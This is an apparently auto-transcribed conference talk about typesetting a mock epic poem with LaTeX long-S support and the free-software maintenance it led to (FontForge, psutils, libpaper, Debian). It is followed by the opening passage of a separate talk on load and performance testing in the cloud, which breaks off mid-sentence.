obviously a fascinating subject for a talk? Well, of course, like all computer scientists by education, I decided I would typeset this work with Leytec, and it's a moderately complicated bit of typesetting with 26 different packages. And in particular, some challenges in the actual nitty gritty of the typesetting, the fine detail with some unsupported glyphs that Leytec doesn't normally have to deal with to draw, because in some cases, they didn't even exist in the fonts, to typeset, and of course, to print. And this was all because I was basing my book design, as indeed the style of the poetry, which makes it up, on an 18th century model, which we'll come to in a moment. And that left me with quite a lot of hacking to do. But first, this is how it came about. This is me about 24 years ago, as you can see already thinking deeply about how on Earth I get to typeset this poem that I haven't yet started to write. And that was the year that I started my university education at Cambridge University, and I spent a lot of my time in this place, which is the chapel of St John's College, where we would sing even song, which is an English invention. It's a sort of mash-up of the Catholic offices of the hours of Vespers in the late afternoon and Complin in the late evening. And it sort of meets halfway, sort of about just before suppertime, conveniently, so that in the old days, when all the men in college, because of course, until 1982, there were only men in the college, which coincidentally was the year I went there to sing as a boy ten years before I started as an undergraduate. But anyway, in those days, all the men would have to go to even song every day. It was mandatory, so there's enough seating there for about 150 scholars, and then they would go to hall and have their dinner. Well, by the time I was there, the choir often outnumbered the worshippers, and we looked something like that. Coincidentally, this picture was taken while I was in the choir, but I'm the only member of the choir not in it. I must have been away that day. But the actual poem was inspired by quite a different location. We used to tour frequently to the Netherlands, and it was in the winter of 1992 that we made one particular tour, the first of my time as an undergraduate, which made a lasting impression on me. And it was in particular when we stayed in a youth hostel that, as far as I can remember, looked something like this, although I have to say in the interests of strict truth, the fact that this particularly youth hostel is not in the Netherlands, it's just a picture that seemed about right. So that was one part of the inspiration, and then the other part is historical. This is the title page of a work by Alexander Pope, the 18th century English poet, called the Danciad. So this is a mock epic. It is a sort of satire based on the Iliad, Homer's Iliad, and it was pretty much an attack by Pope on all the rivals, other poets, journalists, critics of his day whom he detested. And he wrote it with a great many notes, which he claimed to be by someone called Scribleris, but were in fact all written by him. So this is where we begin to see where I got my idea for my own work. And as you can see, this is a, if I, maybe with a little bit of assistance from a zoom function here. Yes. That's, oh, no, that's not, that's not, that's not, that's the opposite of assistance. That's, there we go. So, oh, 1729, there we go. So this is a 1729 edition, which thanks to the wonders of modern technology, one can find on, in the internet archive. No, yes, good. This is, this is really where all the fuss began, the long S. So this will be familiar to German speakers, of course, in a somewhat restricted form. But historically, this is really, you might almost say a Greek thing, or at least it comes to us in the same form in modern Greek. So here we have a terminal sigma, terminal lowercase sigma, which has a more than a passing resemblance to the modern S. And here we have a non-terminal, which can be an initial or medial sigma, so anywhere but the middle of the word, anywhere but the end of the word, which doesn't bear any resemblance to a long S, but it has exactly the same function. So until the late 18th century, English was tight set with two different S's. And so here's a couple of examples where you can see that in the capital, or at the end of a word, it looks pretty familiar. And all the rest of the time, it looks rather like an F. Only again, if I can hopefully this time slightly more, yes, here we are. So if you look at it very carefully, you'll see that it's not quite an F, because the bar only sticks out on the left. Now I didn't want to have to type these all manually. Indeed, at the time I started typesetting it, the book, I didn't even really have that option because although you now have a Unicode code point and some fonts, which even have the long S in the right position, I didn't. So I started typesetting the book in 1998. I finished writing it in 1997. So that took me a mere five years. Then the real fun began. And at that point, there was a package PA-Caslon, which had been written a couple of years earlier, which used the Adobe-Caslon font, which comes, if you get all the expert sets, with long S's. And it had sufficient rules for when to use Wichess and used various bits of Arcane tech magic so that you could type in an ordinary text and it would work out where to use Wichess. So that was nice. But then, unfortunately, as I said, typesetting took me quite a long time. And by late 2012, when it was time to do what I thought at the time was a final printing, the package PA-Caslon no longer existed. But I also discovered that I needed some extra glyphs. So hang on, what's this about final? Because this is 2016 now, and I already admitted that I still haven't finished this book. Well, I had to have made three attempts in total to finish this book. And here was my first. My first attempt was to have a dinner. And here are some of the people who came to the dinner, a lot of whom feature, in some sense, in the book, because they were all on that original tour back in 1992. So this dinner was held in 2013 in the Wordsworth room, appropriately enough, a room in St. John's College named after William Wordsworth, who was, of course, an English poet, who wrote rather more than I did, of rather better quality in a much shorter time, I might say. So that was great fun. But unfortunately, it didn't actually make me finish the book. I was able to supply everyone with proofs, and I got many useful corrections. But I did not come out with a finished product. And there is the dean of college reading a bit about him, while I'm carefully studying the proof in the background. So I had this defunct font package, which I rather needed to typeset my book. And this is 2012, and of course, by then, we had Lua Tech, which has pretty good support for open type fonts, including all sorts of extra features, like alternate glyphs and historical ligatures and ligatures of other sorts. So why didn't I just use that? Well, I had a go, but I couldn't get it to work. And I'll probably get back to that one day, because I probably ought to be up to date with my font technology. So I went back to my PostScript fonts and the ancient font-inst package for LeyTech and PDFTech. And I hacked around with the various tools that one has for turning PostScript fonts into TechFont metric files and TechVirtual font files, and was able, in the end, to reverse engineer the original package, for which I also was able to get in contact with its author, and even he'd lost the source code. So he was very helpful and sympathetic. But unfortunately, I had to do that. And of course, I had to have a play with TechFont encodings. In fact, there's enough material here for another talk, which really should have been given about 12 years ago, because really one shouldn't be doing this sort of thing anymore, as I say. We should be using OpenType. But I couldn't get it to work in this case. But 2016 is not the time to give a talk about TechFont packages and font encodings. So I'm only going to hint at that. So I mentioned a moment ago that I needed some extra glyphs. So let's just see what was actually going on there. Actually, it's a bit hard to do on a beamer because of the resolution. One day, just before the dinner I mentioned, I had my proofs on my screen at a very high resolution. And I noticed something, which I'm going to make you all notice, by the power of hypnotism, because I don't think it's actually detectable on this lay resolution display. But if you look very carefully, then you will see that in this SSI, sorry, SSI ligature, in the word succession, the upper ligature is the one that I drew. Well I say drew. I really just took apart the original characters and put them back together into a new ligature. And then the lower one has a slightly more bulbous end to the second long S. And the reason for that is that the font, the typographers at Adobe did a, it would be unfair to say they were being lazy because what they did was actually very clever. They set up the metrics of the font so that if you had a double S ligature, this is actually a double long S ligature, and then you put it next to an I, the dot of the I would overlap the end of the S and look pretty good unless an obsessive Englishman happened to take a magnifying glass to it at about 800% in his PDF viewer. So obviously, since I wanted to make a physical book, which would have to, that would be it, I'm not going to go through the process more than once, that I had to improve on that. So obviously I busted out Font Forge, which at the time was the only really sort of comprehensive free software font editor. That's no longer the case actually, but it's still pretty good. So this is my first side project. So in January 2013, I first did a little bit of work on Font Forge. I'd been using it to try to understand why I was having trouble with OpenType, in particular the historical features. And I just happened to look at some of its source code and found a comment that was a bit misleading. So I clarified the comment. So that was my first mistake, it turns out. In July, I've reconstructed the history from looking at the commit logs for Font Forge. In July 2013, I went a bit further and I actually touched the code for the first time, and I did a little bit of tidying up. And then the next year, by which time I'd already used Font Forge to draw my two extra glyphs, a long double SI and a long double SL, beautiful. But then one day in 2014, I opened Font Forge and I found that the entire interface was using GNU Unifont, which is a wonderful font of last resort, which has a glyph every single Unicode code point, and they update it every time there's a new version of Unicode. But you really don't want it in your user interface. And the reason that this had happened was because of a mistaken bit of configuration in Font Forge's resources. So I fixed that, and after that, it was all downhill. I found myself doing all sorts of general code cleanup and simplification in Font Forge that had nothing to do with anything I was actually using it for. And then a couple of months later, Dave Crossland, who is a great and energetic advocate and activist for Free Fonts, invited me to work on Metapolator, which is something completely different. So it needs a different window. I should just quickly, this is really a sort of advertising break. I should just say that if you're at all interested in amazing things you can do with fonts these days, you should definitely have a look at Metapolator. This is metapolator.com. It's still somewhat of a prototype, but the basic idea is that you can have two fonts. Here we have a Roboto Slab Lite and Roboto Slab Bold, which you probably can't quite see because there are tiny letters there. But what you should be able to see is if I move this slider, it changes the font. And it's actually generating that on the fly. And in general, Metapolator is a set of technologies for making font families that are essentially parametric, rather like, you may think, since I've been talking about tech and latech throughout this talk, the original computer modern fonts. But updated in such a way that they're easier to use for typographers who today are probably less used, like Donald Nooth, to actually programming their fonts in a sort of dialective list or meta font or whatever. And instead would rather have something a bit more graphical. So there's Metapolator, which I should also say is involved. It was conceived originally by Simon Egley, the user interface by Peter Siking, and has mostly been programmed by the indefatigable Lassifista. So back to late 2012, a more urgent problem I had just before this dinner, which was supposed to be my way of finishing the book, was that I couldn't actually print the book, which is for a document that is supposed to be printed and bound and available for people to handle was a bit of a disaster. That turned out to be because of a bug in the PDF printing stack at the time, at least in the current, whatever, was the current version of Ubuntu. That would probably have been precise at the time since it was late 2012. And that was not something I had the ability to fix in a couple of days. So I thought I'd use a clever workaround, which was instead to print from PostScript. And PSutils is an excellent suite of programs for manipulating PostScript. And so I thought I would use them to get my PostScript pages and arrange them in a book that I could print neatly as a booklet that people could have at the dinner. Unfortunately, it turned out that at that point PSutils had a bug when printing N up. So you want to print, in my case, something like A5 pages on an A4 sheet, which I'll then fold in to make a booklet in a fairly obvious way. So I fixed the bug. And then I had another bad moment because I noticed that the package was no longer maintained upstream. So I got to work. I added all the patches that Debian had put in over the years. I rewrote a lot of the documentation. I rewrote the build system. I used lib paper everywhere so that you could use human readable paper sizes like A4 and B5 rather than having to give dimensions in points or millimeters or something like that. And I also managed to simplify the code somewhat. I mean, the upshot in the end was I became the maintainer of PSutils. So accidentally while writing a book, that's six months of employment working on Metapolator. And I've suddenly acquired the maintainership of a free software package. Oops. And also there was one more last minute bug, which was that after all this duplex printing of PostScript didn't work. So I had to manually duplex having spent a great deal of money on a printer with a duplex unit. So I just mentioned lib paper, which was at the time a Debian specific library for describing paper sizes. Very simple. You just have a list of paper sizes and their dimensions in various units. It might be millimeters or points or inches depending on the natural unit for the paper size. So you'd probably describe A4 in millimeters and US letter size in inches. For example, that was worked by Yves Arrouill and Adrien Bonk. But it was unmaintained for several years by the time I got my hands on it. You can see where this is going. So it was an optional dependency of PSutils at the time. PSutils was a portable package. Lib paper was only intended for Debian. But I thought, well, it would be nice if it didn't have to be optional. So again, I applied all the Debian patches. Yes, there were Debian patches, even though it was a Debian native package. I added more paper sizes. There are, of course, nice lists that you can find in places like Wikipedia. And it was actually surprising that you might think that there'd be pretty much infinite number of paper sizes. And there probably is in reality. But I could only find about, I don't know, 30 or 40 by searching various places on the internet. I updated the build system, removed KNR-C support, because the program was written long enough ago that it still supported pre-ANSI compilers, rewrote the documentation, simplified configuration, as you can see, the list goes on and on. Oh, one nice thing was actually that on modern GNU Linux systems, it turns out that you can get the default paper size for a particular locale. From a non-standard locale setting, LC underscore paper. Although, unfortunately, it's only in integral numbers, which is unfortunate because not all paper sizes are expressible. It's an integral number of millimeters, in particular, US letter size. But that's another story. But anyway, it's nice because now you don't actually need to configure a default paper size. If assuming you're using your locale's default, which is going to be the case for 99.9% of users, you can just read that from the system. Oh, and I rewrote it in Perl. Now, hang on. This is a C library. What's going on here? Well, there were a few things I wanted to achieve here. For verification, I managed to get this package, which does a pretty trivial job, right? Taking a list of paper size names and dimensions, and you can match dimensions to a size or find this dimensions from a size. That's all you really want to do, plus have per user settings and a system default. That was nearly 50, well, getting on for 1,500 lines of code in C. I reduced it to about 150 in Perl. Obviously, I got rid of lots of bugs because everyone knows that if you delete code, you remove bugs as well. Made it accessible from other languages because the previous, because lib paper really was just a C library. If you wanted to access it from any other language, you had to write, you had to use a binding to the C library. Now, of course, you have the opposite problem that you have a small executable, which is very easy to use for most languages, because you just run it with some command line arguments and you get back a result. That's not a thing that's quite easy to do in C, so I'll say how I solved that problem in a moment. At the same time, keep it portable because I think, again, it's a reasonable assumption that if you are running on a particular computer system, a program that needs to ask the user about paper sizes, you've probably got Perl installed. Later, I decided to write PSutils in Perl 2, but I'm not going to tell that story today, so don't worry. Then finally, on this nested dive, I've gone from wanting to print a book to maintaining PSutils to pretty much maintaining lib paper and rewriting it. Now, I'd like to share this work with other people and inflict it on the rest of the world. So I thought that if I wanted to get paper into Debian and also help update PSutils in Debian, then I'd better actually become a Debian maintainer, because it wasn't something that anyone else is going to be interested in with two basically unmaintained packages. And for non-specialists in the room, I should say Debian maintainer is not the same thing as a Debian developer. So in other words, not somebody with a vote on important matters and high-level access. This is basically a sort of supervised access to Debian only. So at this point, I should just make an acknowledgment to Wookie for seconding my Debian maintainer application and Dmitry John-Ledkov for signing my GPG key twice because of confusion over how long it had to be. I don't know, I just seem to attract bugs sometimes. That one was just a bug where two different places in the Debian Wookie had different information on how long a maintainer key had to be. This work is still ongoing. If you are interested in very old paper-based things, then I'm hoping to get it into Debian unstable in the next few months. So that sort of takes us up to the end of 2014 also. Every year later, I still hadn't finished the book. So I thought I should have another go. The next go was this talk because I thought, well, if I had to give a talk, which it would be nice to actually show a book, then I'll have to finish the book, right? Well, it almost worked. More on that later. But I'm sorry that if you read my summary and we're hoping to see an actual book, then I don't have one today. But nearly. So usually one looks into the morals of a project when you're sure it's absolutely over. And I'm going to provide some evidence that I think I have got sufficiently close to the end that I can do that now. And as I was thinking back on it, it occurred to me that this has something to do with the cardinal virtues of the programmer as laid out famously by Larry Wall in his book, Programming Pearl. Yes, Programming Pearl, the camel book anyway. So for those who are slightly rusty in their memory of Programming Pearl, the three cardinal virtues of the program are laziness, impatience, and hubris. And we'll just look at how those pertain to this project one by one. So I'm a great believer in going back to the sources, checking that you have remembered correctly what you mean by a term that's important. So I've actually found the quote from the second edition of Programming Pearl. Laziness is defined by Larry Wall and his co-authors as the quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful and document what you wrote. So you don't have to answer so many questions about it, hence the first great virtue of a programmer. Well, as far as what I've tried to do with the various projects I've described, I would say I have tried to be lazy, although I can say also that it didn't feel like that at the time. I'm not sure quite how you'd apply this virtue to poetry. Arguably from a poetic point of view, I've done a ridiculous amount of work other than actually writing words. But I think anyone in the audience who is familiar with procrastinating will recognize the temptation to get involved in side projects. So second virtue, impatience. So again, quoting from Programming Pearl, the anger when you feel when the computer is being lazy, which is a nice bit of recursion, this makes you write programs that don't just react to your needs but actually anticipate them. So I would argue that, again, a large part of the work I did on the typesetting of the long S was precisely with this in mind. There are all sorts of rules. There's a wonderful blog post I used, which you will find if you search for Rules for Long S, where someone actually went and looked at a great number of old books and deduced, because nobody as far as we can tell ever really wrote it down, deduced the rules for when you use a long S and when you use a short S. Because although what I said at the beginning is basically true, that you use the long S everywhere except at the end of a word and the short S at the end of a word, it turns out there are quite a few exceptions whether to do with particular letters, such as you think the short S before a B or a K, and there are also rules about what you have to do with hyphenation and all that sort of thing. So it's really not the sort of thing you want to do manually, choosing between the two versions of the letter. You really want the computer to do it, and hence you want the computer to not be lazy and do all the work for you. On the other hand, I did wait an awfully long time for the support to be written in the first place, and then I waited so long that it became obsolete again. And you could argue that that's a bit too much patience. Finally hubris. So programming Pearl again, it says of hubris, the quality that makes you write and maintain programs that other people won't want to say bad things about. Well, it's interesting to read that because I actually thought that it meant something a bit different, which proves that over the years you can easily forget the original sense of a text that you read. Because I think often people use refer to hubris as a shorthand for it's sometimes a good idea to do something new. But that's not really what Larry Wolz is saying here at all. So apologies for contradicting the published talk abstract in the sense that actually having read that again, I have to say that I don't think I've gone against that at all. Although possibly other people won't want to say bad things about. Well, if nobody else uses the programs, then of course they're not going to say bad things about it. So possibly not writing programs that are so obscure that nobody wants to say bad things about them. I wouldn't necessarily advise that. I said it also at the beginning, I would say a word about proprietary code. Now the only proprietary code I've actually mentioned in this talk is the Adobe Castlon font. And I would just say that I think that does count as code. Well, I mean, apart from anything else from a practical point of view, of course, software fonts as opposed to old fashioned pieces of metal do actually come under copyright law rather than just design law. And so although Adobe Castlon was issued in 1990 and I think 1992 it was updated, it still won't be out of copyright until the Disney Corporation finally fails to persuade the US Congress to extend the copyright on Mickey Mouse's ears. So in other words, it's still in copyright and will be for a very long time. But despite that pain in the neck, sometimes proprietary code is all there is and you have to kind of try and work with it. The biggest, the most obvious example in this case being that I needed to make some changes to the font, I needed some extra glyphs. And of course, I can't distribute those extra glyphs. So what I do in the Adobe Castlon latex package, which I contributed my long S support to, is I simply give hints on how you might use a font editor to recreate the glyphs if you want. And if you don't put in that effort, then you can still have all the extra long S support without my two extra ligatures and that's fine. So it degrades nicely. Of course, one nice thing, at least if you're thinking long term, is that in any particular case you can beat proprietary code in a sense by share patience because eventually the copyright will run out. Although often, of course, one dies before that point, which is sad. And of course, realistically, I would love to have a free alternative to Adobe Castlon. I only used it because I couldn't find a free typeface that had an 18th century style and was actually drawn. I found several that had just been quite nicely scanned from books so that if you wanted to make a book that looked as though it was made in the 18th century, rather than just in an 18th century style, they would be fine. And of course, with full support for the long S, say with all the extra ligatures. So if anyone knows of such a thing, I'd love to hear about it. So at the end of any epic, well, at the end of almost any poem, at least from the 18th century, you have to have a moral. So I've got several from my last 24 years of experience with this project. First, I think I've just said proprietary code is a pain and fonts are more engineering than art, which is why they come under the heading of code. Waiting often helps. So I've given some examples where it helps. I've given some examples where it helped, didn't actually help because too much waiting can be a bad thing. But it was amazing how many of my little type setting problems were solved by packages that were written long, long after I started the project. I think there's some value in allowing your passions, as I say, to mutate. So this is, of course, one way to cope if you're waiting. It's another way to cope if you're procrastinating. But the fact that I enjoyed both writing poetry, making a book, and also hacking on various bits of free software, I think made the overall experience rather more interesting. And even, as I said earlier, with my work on Metapolite, or even resulted in some employment, which is a bit of an odd thing for something to come out of trying to imitate an 18th century poet. So that was that sort of fun and for profit there. And then on a programming side, old code, I said here, old code repays new effort. And I think, of course, most code repays effort. If you put effort into improving, maintaining, extending code, you usually expect to get something out of that other than just the enjoyment of doing it. But I think old code has some particular advantages because, as I say below, abandoned projects, especially those started years ago, are often simple and small. They're not fast-moving targets. So stepping up to help with them can be very easy because there's maybe one maintainer left or no maintainers at all. So you don't have to engage with lots of process. And you can just start by fixing a few small things. I think you saw the pattern in the various projects I was involved in. It mostly started with a small fix and then turned into something larger. Although as I think I've also illustrated, it can end with you taking on perhaps a rather more responsibility than you might have intended. That might be a good thing, too. But I think there's quite a lot of code like that. So if you look at any system, especially one based on free software, you'll find that most of the effort is at the bleeding edge, I think. And with a few exceptions, such as, say, the Linux kernel itself, there's not so much effort right in the core. There's a lot of code that doesn't perhaps need a great deal of effort. It's quite happy. But on the other hand, an awful lot of long-standing bugs that are annoying people that have kind of fossilized, that have familiar workarounds, but why not go and fix one or two of them, make the world a slightly less, a slightly more reduced friction of the free software world? And finally, of course, not forgetting that there are other things than code, which is sort of where I started. So my final attempt to finish the book, I came up with just before, just in the last few weeks, just as I was starting to write this talk. And in the end, the most effective way to finish it proved to be not to finish it. So as I said at the close to the beginning, the main aim of the typesetting project was to have a physical book that's actually sewn into signatures, which are small numbers of pages folded together, and that you then sew together into a larger book and bind in leather, perhaps, or in cloth. And I realized that, of course, in the 18th century, where every page had to be laboriously set with metal type by hand, you probably had to print all the books in a print run from the same set pages. But in the 21st century, where I'm doing my in-printing, that's the one bit I'm sort of keeping 21st century technology, with a laser printer, it doesn't really matter. And so now, I just decided, well, if I didn't have any dreadful errors, I could just carry on tweaking the text every time I print out a new copy. But rather than throwing the copy away, I can keep it and make it into a slightly different book so that if you remember that photograph of all the people who were at that dinner three years ago, each of whom paid in their ticket price for a copy of the book, they'll all now be getting slightly different versions of the book, which I hope will amuse them. So as of Friday, well, that's yesterday, isn't it? Gosh, sorry, I've been travelling quite a lot in the last few days. But as of yesterday, I had five copies sitting on my desk at home, ready to go to the binder, and I hope to accelerate some more and get up to more like 25, which is how many I'm going to have bound next week. And so I should have in that set about six or seven different editions, all in the first print run, which is a nice 21st century thing to be able to do. So I just thought I'd give you a flavour of what I've actually produced. And I'm going to give it to you in two forms, because I think I've just about got enough time. I haven't seen one of those cards yet, and I'm just now seeing that I have 15 minutes left, which is definitely long enough for this and one or two questions. I'm going to show you what it looks like and read you what you can see as well. There's the poetry, not the footnotes. So I don't know if you can see these numbers, but we're at line 240, which is quite close to the end. I did describe the poem as a mock, mock epic, because, well, if we go back to the original, of course, an epic, we might expect to be several books long and certainly several thousand lines and on a very serious subject like wars between gods or heroes or that sort of thing and involve lots of ships and horses and swords and that sort of thing. And then a mock epic, like the mock epic of popes that I showed you, the duncead, is still quite a long thing. The duncead comes in three books and is still well over a thousand lines long and is not actually about gods, but it's sort of about pretend gods, like the goddess Dullness, for example, and the duncead ends with a wonderful scene, which you would quite easily recreate in this room if only you had a... Is there a light switch? Is this a light switch? Oh, yes, that'll work, yes. Okay, so here we go. The last two lines of the duncead. Thy hand, great Anarch, let the curtain fall and universal darkness bury all. End, you see. So that's how that goes. So it has a certain something. It's very much following the sort of scale of epic poetry, even if by introducing characters such as the goddess Dullness, it's not being entirely serious. So hence the mock. Well in the youth hostel, the action takes place over a single night. The choir arrives at the youth hostel, they stay the night there, and in the morning they leave again. And not a great deal actually happens. And so hence mock, mock epic. It's smaller, it's less serious. And here's the scene where the choir, having spent the night in the youth hostel, and having waited with some trepidation for their coach to arrive to take them onto their next venue, finally, they're sitting there in the, you have to imagine a somewhat sort of drab day in December in the Netherlands. Not that drab days in December are the exclusive preserve or even a defining feature of the Netherlands, just that this happens, this just happened to be one of those days. And sitting there with suitcases and that sort of thing in this youth hostel in which incidentally we were the only people staying. It's been made open especially for us in the middle of December, it's not really the time of year for youth hostels. And here's what happens. But stay, far off is heard a tiny hum, no louder than a fly, when it does strum with brittle wings the air. Is more a sound of purpose, does not miss a beat or varying its tone. Indeed it swells, it grows. The choir begins to heed, till suddenly a small boy does exclaim, Tis Rex, Tis Rex. Is it? It is, the same, I should insert here that Rex was the coach driver. Such rapid embarkation do we see, as if the singers minded were to flee and rather than a coach, the desperate choir boarded instead a chariot of fire. Now like a charioteer Rex yells, hold tight, and with a roar it zooms out of sight. Man, woman, boy, most solemnly they swore, from that day forth youth hostels, to a pour as nature doth a vacuum, and to find them lodging of a more commodious kind. First, in Holandsebyslos, leafy bowers, then midst fair puttons, bottle banks and flowers, they tarried. In the future who can say, in what Arcadian palaces they'll stay, in what palatial arcades they may find nightly relief from Toring's daily grind. But now our tale is told, our yarn is spun. It is time to call an end to fun, for we must find a moral, that we may as much in spirit as in heart be gay. Nor mere good humour from our verse derive, but holy learning that our souls may thrive. Fear not if thirst you fall, but like the dove, strive ere to seek those things which are above, where Christ sits, there may all we upward tend, and at the last to him in heaven ascend. And rather appropriately for that somewhat heavenly pointing ending, those last lines were actually written on an aeroplane. And imagine the cabin crew's surprise when I rang the bell when they came, instead of asking for a cup of water or something like that, I asked them, what's the name of this plane? Because I noticed that it's conventional when you're in this position of finishing a work on board a boat or a plane, rather than signing it with a place, you sign it with the name of the vessel. So there it is, Virgin Atlantic Rainbow Lady, September 16, 1997. And I just want to say some extra acknowledgments, as well as everyone I thanked already during the talk for their various bits of people, help, various bits of people, that sounds awful. Sorry, I just want to say a big thank you to Frostconn 11 for having me, and in particular for the immense hospitality that making this, that the organizers have shown, making coming here extremely easy as well as very pleasant. And to Der Peter for suggesting that I apply to tell this tale in this talk in the first place, which I told him in a pub in Cambridge last November, and he stopped me. And I thought it was just because he was, maybe it was because he was terribly bored, but I thought it was just that. He said, oh, you should come to Frostconn and talk about that. So if you have any, if I have a tool peaked your interest in seeing how this turns out, then do follow, of course, this is an S, SC3D, and I always tweet with a hashtag youth hostel whenever I have anything to say about that, so you don't have to read everything else I say. And I hope I'll actually have a finished version very soon. And although I, as I said, the focus was very much on making a real physical book in the first instance, I've also put quite a lot of effort into the PDF version. I will continue to improve on that as the paper version is finished, and it will become a more purely electronic work. There is actually a murder mystery hidden in the footnotes, which I haven't alluded to because there wasn't any time, but that's that. So if anyone has any questions, I'd be delighted to take them in the five minutes remaining. The one question I'm hearing is, can we go now? Yes! Yes, please. Have a wonderful time. Oh, sorry. I'm sorry. Sorry. Hi. Will your text be available to the public at some point? Yes. So there's, sorry, the question, I wasn't sure whether that was amplified. The question was, will the text be available to the public? That is one reason, one additional reason to follow the project is that it will be, in fact, the final version of the slides, which I'll make available through the conference site as well for ease of finding, will have a link to some version of the text. Yes. Yes, absolutely. Yes, absolutely, yes, indeed, that's largely the point of the electronic version is to have a version that I can share with everyone who didn't come to a dinner three years ago and won't have a physical copy. And indeed, the murder mystery I alluded to is not, is only hinted at in this book. That's the topic of my next work, which by extrapolation will be available in about 50 years. Is that all? You've been a wonderful audience. Thank you very much. Thank you. Thank you.
|
I will discuss how it took me nearly 25 years to produce a 40-page book: the writing, typesetting and binding of my mock–mock-epic poem The Youth Hostel, and how this led to my hacking on LaTeX font support, taking over the maintainership of psutils, becoming a Debian Maintainer, and working for Google. On the way, I found that the opposites of Larry Wall's cardinal virtues of the programmer can also be virtuous.
|
10.5446/32461 (DOI)
|
Welcome. My name is Sebastian. I'm going to talk about loading performance tests in the cloud. And I would like to give a brief overview of what I actually mean by that and why and how you can do performance tests. A little bit about me. My name is Sebastian. I'm on Twitter and GitHub and the Internet. And for the last seven-something years, I've done lots of consulting and development work with a strong performance, focus on performance and architecture, software architecture and system architecture. And this ultimately led to the founding of Stormforger now two and a half years ago where we built tools and a platform and services and we offer services around load testing and performance testing, basically HTTP-based systems. And now before we actually dive into the topic of performance testing and load testing, I would like to define or talk about some of the, or give some definitions about some of the basic words that are involved in this topic. And the first one would be performance. And it's quite interesting that that performance is often understood in multiple ways and used interchangeably with other terms that we will come to. And I just want to make sure that we are here on the same page what we are actually talking about. So performance is the, oh, that's interesting, the ability of a system to fulfill a task within a well-defined dimension. And this is basically efficiency. So the task could be a transaction or a web request or something like that. And the dimension could be time, then we get something like response time. Or it could be memory usage, disk usage, or even money. So you could also define performance in terms of the efficiency, how much does it cost to server-specific transaction. So the statement like one server can do 250 transactions per second within a defined quality criteria would be a statement of the efficiency of the system or about the performance of the system. This is heavily simplified, of course. And the next term I would like to talk about, which is often used interchangeably with performance, is scalability. And actually they are not that much the same. They are not really, really comparable to one another. Where performance was the efficiency of a system to fulfill the task within a defined dimension, scalability on the other hand describes the effectiveness on how you can grow capacity of your system by adding resources. So the degree on how effective you are in translating resources into capacity. And if you take the statement from before like one server does 250 requests per second within a defined quality range, then the statement of 10 servers can do 10 fold would be actually a very good scalable system. Like 100% of all the additional resources are translated into additional capacity for the system or throughput in this case. There are different mathematical models and categories to describe scalability, which I won't go into. But just to give you a good distinction of what performance means and what scalability means because that will become important later on in this talk. So I would like to ask a question that was asked by Jonas Bonnier. I'm not sure how to pronounce his name. He's the founder and CTO of LightBand, the Aka framework. Maybe someone heard of it. And he gave a presentation I think many years ago where he asked two really nice questions. The first one was how do you know that you have a performance problem? And the answer is if your system is slow for a single user, then you have a performance problem. I like this sloth. And the next question he asked in this presentation was obviously how do you know if you have a scalability problem or a scaling problem? And the answer is if your system might be or is fast for a single user but really slow under heavy load or high traffic. And this is a really nice visualization of what is the core difference between performance and scalability. And Robert Johnson, he was the director of software engineering at Facebook, wrote an interesting article in the Facebook engineering blog also in 2010 I think where Facebook was really small like 500 million users. They just reached 500 million users. And he talked about how they do performance optimization projects and scalability improvement project at Facebook. And he made a couple of really interesting statements. First was that scaling usually hurts performance. So they are contradicting each other. And also that efficiency projects, so efficiency means performance. That efficiency project really gives you enough improvement to have a big enough effect on scaling. So they are reaching an area where it is more effective overall to have a better scaling system versus a better performing system. So they are sacrificing efficiency for scalability. And another code was that efficiency is important too but they think of it as a separate project from scaling. So they separate this completely. So next up, performance testing. So now we know what performance is and what is not. And now we take a look at what performance testing actually means. And the best definition, this is slightly completely in English because the English Wikipedia is much, much better than the drum one. And the article on software performance testing I think it is has a really nice description of performance testing. So when you do performance testing or this is a testing practice in general where you determine how a system performs under a particular workload and you take a look at the responsiveness and stability of the system that you are testing. And to put it in other terms, they all have in common, this is a category of testing methods and testing practice and they all have in common that they all induce a well-defined workload to a system that is under test or SUT system under test. And you do that in order to observe the system's behavior and to verify performance-related characteristics or if you need to guarantee certain service levels then you can use performance tests in order to verify those characteristics. And you also want to do performance tests to simply understand the behavior, the internal behavior of your system that you are testing. There are lots of categories or sub-testing methods that could be summarized as performance tests. They are not all very well defined or it is oftentimes not as simple as it sounds to say, okay, this is a stress test, this is a spike test. It is more about what the goal is that you want to achieve for selecting the right testing methods in your case. But we will go into some of those testing techniques later in this talk. So now we have one final piece to make the talk title complete. We have to talk about this cloud thing. So the cloud. I am not here to sell you the cloud, I just want to describe what we have by all those cloud vendors that are available to us. We get basically infrastructure as a service, so we get networks, compute, storage and all those things. We get a platform as a service sometimes. But the most important thing is that we get APIs and automatization across all those services and components. And we get this on-demand which makes it really easy to achieve a cost-effective and scalable system. So now to the actual topic. So what about performance tests in this cloud? And you could now ask the question, why is this now relevant? Because I just told you that the cloud is scaling for you. You just buy more stuff, swipe your credit card once more and boot up more servers, whatever. And the obvious problem with that is that scaling resources doesn't necessarily mean to scale an application. This is only true if you have a very well-defined system and software architecture that powers your entire application. And to give you a really, really stupid and simple example how this isn't true or this... No, let's skip that. So maybe you're running in the AWS cloud. I'm not sure if you're familiar with it, but it doesn't really matter. Maybe you have an automatic load balancer that scales automatically for you, which is great and fine. There are pitfalls there as well, but in general, you're good. Then you have your applications or web server tier that you have provisioned in an auto scaling group, which means that it will automatically add more resources to your problem if you have a higher throughput or higher load on your system. And then, of course, you have some sort of a persistence layer maybe behind that. And if you have this scaling well, this scaling well, and only one master server, for example, then your thing will break eventually. So it is maybe a too simple example, but just to give you an idea that you just can't ramp up your resources and get automatically more capacity out of the system. If you are a bit familiar with the cloud services that are available today, then you might think of what about all those fully managed services that you get from them, where the provider actually cares about everything. You just say what you need and how much you need, and you pay for it, and they manage basically all the provisioning of the resources below that higher level service. Examples for that would be AWS Lambda or the Google compute equivalent. I think it's called functions, but I'm not really sure. There is this DynamoDB database and Datastore and event streams and queues and everything, and those services aren't really resources, but they are higher level services that are managed by the cloud provider for you. So in this case, what is the problem with that? And basically, it boils down to complexity, and complex systems are, oh, God, what is vexelworkung in English? I have no idea. Yeah, if systems interact with which if other in a high degree, then they are complex, and this is something that I've taken from the physics area. So the problem is complexity, and the complexity hasn't simply vanished. It's not like that magically you are moving from your on-premise data center to the cloud, and everything is simple and easy. It might be easier to get started and to build more sophisticated systems, but in the end, either you have some additional complexity there or your provider is managing the complexity for you. So some of the complexity is hidden, and other complexity is, yeah, it has shifted from your side and from your operations team, for example, to the teams at AWS and Azure and whatever. But it turns out that this complexity often has a non-trivial impact on performance 